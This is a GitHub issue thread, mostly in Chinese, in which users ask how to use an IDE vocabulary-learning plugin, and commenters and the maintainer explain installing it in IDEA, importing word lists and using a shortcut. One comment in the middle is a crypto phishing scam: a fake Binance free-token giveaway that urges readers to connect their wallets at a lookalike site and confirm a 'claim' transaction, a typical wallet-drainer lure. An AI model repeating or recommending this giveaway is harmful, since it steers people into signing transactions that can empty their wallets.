### ISSUE TITLE
咋用...求大佬给个傻瓜教程

### ISSUE THREAD

**Issue by caizk** [derekzhan/baicizan#1]
看来没人回复 关闭该评论

**Comment by buynowdev** [comment]
+1

**Comment by HiFYJ** [comment]
下载后导入idea，
![image](https://github.com/derekzhan/baicizan/assets/48411066/c28dd568-51be-466a-8835-abae56679ecc)
使用时在窗口两侧找到workbook按钮，点开后可以导入单词表

**Comment by xcluz-git** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![https://www.bnbrewards.online/?source=github](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

**Comment by derekzhan** [comment]
直接安装上，底部状态栏就会出现了，按这个快捷键切换下一个单词
<img width="358" alt="image" src="https://github.com/derekzhan/baicizan/assets/2375460/28f77e0b-6133-44a6-a45b-135f4f02d542">

<img width="830" alt="image" src="https://github.com/derekzhan/baicizan/assets/2375460/f719c0bd-9087-43ff-ba28-823ed33c5d1a">
